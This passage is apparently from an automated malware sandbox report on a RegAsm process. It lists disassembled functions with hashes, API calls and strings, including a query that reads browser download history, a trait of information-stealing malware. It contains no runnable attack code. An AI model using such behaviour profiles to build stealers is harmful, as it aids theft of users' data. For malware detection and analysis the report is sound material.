                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                • Instruction ID: 540d36e59252c19a3777ba8528a3b8d9cbe1473a9e59c7463fe7d8f63c94216b
                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B1CFB1A04702ABE744CF29DC81A9ABBE5FF88254F04453DF949D3711EB35F9248B91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AE260 Relevance: 10.8, APIs: 7, Instructions: 301COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6c696cbe0c67dbd42d6d28b23f906cf8165a802ceb2b5a74fd68971baef17ece
                                                                                                                                                                                                • Instruction ID: a549709cbc80f821b13e53177f626a24d1250cbb50b85ec0bf15b53d9d1babf2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c696cbe0c67dbd42d6d28b23f906cf8165a802ceb2b5a74fd68971baef17ece
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FA16771A443514FDB20CF38D8917DABBE5AFA8314F28892DE8E697381E335D845CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040752E Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407533
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077FF
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407813
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                • API String ID: 3193997572-2241552939
                                                                                                                                                                                                • Opcode ID: 345d1b81f1e86f66f721e7032b8650fa5e2dcdd9e18d0337e69d876e03cf7983
                                                                                                                                                                                                • Instruction ID: 24812c0fe3bee4bc31f2b58e37fc786c9efcc8e1e356c96fca072d0e9bd0485e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 345d1b81f1e86f66f721e7032b8650fa5e2dcdd9e18d0337e69d876e03cf7983
                                                                                                                                                                                                • Instruction Fuzzy Hash: F3B17171804148EACB05EBE6D955FEDBBB5AF29308F1044AEE446731C2DB781B18DB36
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A5930 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                                                                                                                                                                • API String ID: 0-2679805236
                                                                                                                                                                                                • Opcode ID: 874fe8817ab0c6a2ade49e1d030a0b146560e8b2af95bf51d9e05b5dbe940080
                                                                                                                                                                                                • Instruction ID: 68508619a871486878ea80e2c6466ed192c99cf10e8b1388403b5ee8abce4e8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 874fe8817ab0c6a2ade49e1d030a0b146560e8b2af95bf51d9e05b5dbe940080
                                                                                                                                                                                                • Instruction Fuzzy Hash: B871D371A043068BCB04CF38CD84A9AB7E8BFA4214F05852DE88AD7341EB35E949CBD1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5AF0E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 216COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                • API String ID: 0-3864549341
                                                                                                                                                                                                • Opcode ID: 65b2e1bf07bdc50ecab10cc9731a8898aef4917437aba0d65a41288ff91bd9d7
                                                                                                                                                                                                • Instruction ID: 589b73edfe0eaa4affc1be4e0efc8d1f00c938b27e6072c6452d581665d6eeaf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b2e1bf07bdc50ecab10cc9731a8898aef4917437aba0d65a41288ff91bd9d7
                                                                                                                                                                                                • Instruction Fuzzy Hash: F06156B5A00B016BF701AF30CC56BDF7BA8AF41305F004528E856EB2C2E7A5E155C7A5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C09C2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1B4C0B3B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
                                                                                                                                                                                                • API String ID: 0-2869280805
                                                                                                                                                                                                • Opcode ID: 0d4b6a79c0f3f50deb11847bc0c61aee8df353d23c0c0208f370d9a0895e6580
                                                                                                                                                                                                • Instruction ID: 0645a15231f2de175e5ebbd1523347db1fa0c14c4b2f000f8a35a4961cd4aa95
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d4b6a79c0f3f50deb11847bc0c61aee8df353d23c0c0208f370d9a0895e6580
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3441B1BAA013019FDB00DF98EC809A7F7A5FF89625B0085BEE64887711E772E855C790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B3F30 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                                                                                                                                • API String ID: 0-131617836
                                                                                                                                                                                                • Opcode ID: 9709a4853c1abfb2b7469dc6e4de6539e2730c0769a8e9b9df498c5a0ce997ab
                                                                                                                                                                                                • Instruction ID: 97b88b50acce4b66c50461867a875873f851a124bc8849715c550a359b2e075e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9709a4853c1abfb2b7469dc6e4de6539e2730c0769a8e9b9df498c5a0ce997ab
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051F576E041828BDB008F14D6807E6B7B1FB52324F85C1A8EA865B745E732ED878B71
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B1120 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: main$rbu_memory
                                                                                                                                                                                                • API String ID: 0-3973752345
                                                                                                                                                                                                • Opcode ID: 8d837449475f83fd564ee1ea33dad1f257441e01a70f18edb580520ac15d20cd
                                                                                                                                                                                                • Instruction ID: 5cb2fa5ac353672c0cd2ab1f0d634a3d39606fc7d2c9daec7845dfda6538cd34
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d837449475f83fd564ee1ea33dad1f257441e01a70f18edb580520ac15d20cd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8751C3756003019FDB04CF66D980B96B7E8EF98215F04842EEE85D7741DB35E949CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A8C40 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • winAccess, xrefs: 1B4A8D60
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B4A8D35
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                • API String ID: 0-1873940834
                                                                                                                                                                                                • Opcode ID: 631bfc5c555f8a6039ed0c453a973c99c54746166d779cd37f60615d19539185
                                                                                                                                                                                                • Instruction ID: 36eaa45a45e42f20b9a20270e9c59410768ad46d9a517afb49bcd222f69586d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 631bfc5c555f8a6039ed0c453a973c99c54746166d779cd37f60615d19539185
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1941E8B2D053429BF704AB34D882ADBFBA4EBF5210F458A2DF8D7523D0D620D484C692
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5B9350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 673f2b75e63c4e3b5897f0b7fa562f5b0ec0bfd6116aba0d87448d8eb7066e08
                                                                                                                                                                                                • Instruction ID: 02eae5605f4a268da3ec42030387484b1024c58d295c62dede9e033c1c5d32c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 673f2b75e63c4e3b5897f0b7fa562f5b0ec0bfd6116aba0d87448d8eb7066e08
                                                                                                                                                                                                • Instruction Fuzzy Hash: A25164708006219BEB186F75DECDA5737BDBFA0659B00482CECCAD2111DB35E49CCAA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5415C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                                                                                                                                                                • API String ID: 0-3074873597
                                                                                                                                                                                                • Opcode ID: c474f0a33244b47cf0c68bbe060602954d43477e6f4fa18eca0753a958e12db8
                                                                                                                                                                                                • Instruction ID: 82d3180d54d6c0981d96cac929f595a356534694435a24629c3c9c2c14575a10
                                                                                                                                                                                                • Opcode Fuzzy Hash: c474f0a33244b47cf0c68bbe060602954d43477e6f4fa18eca0753a958e12db8
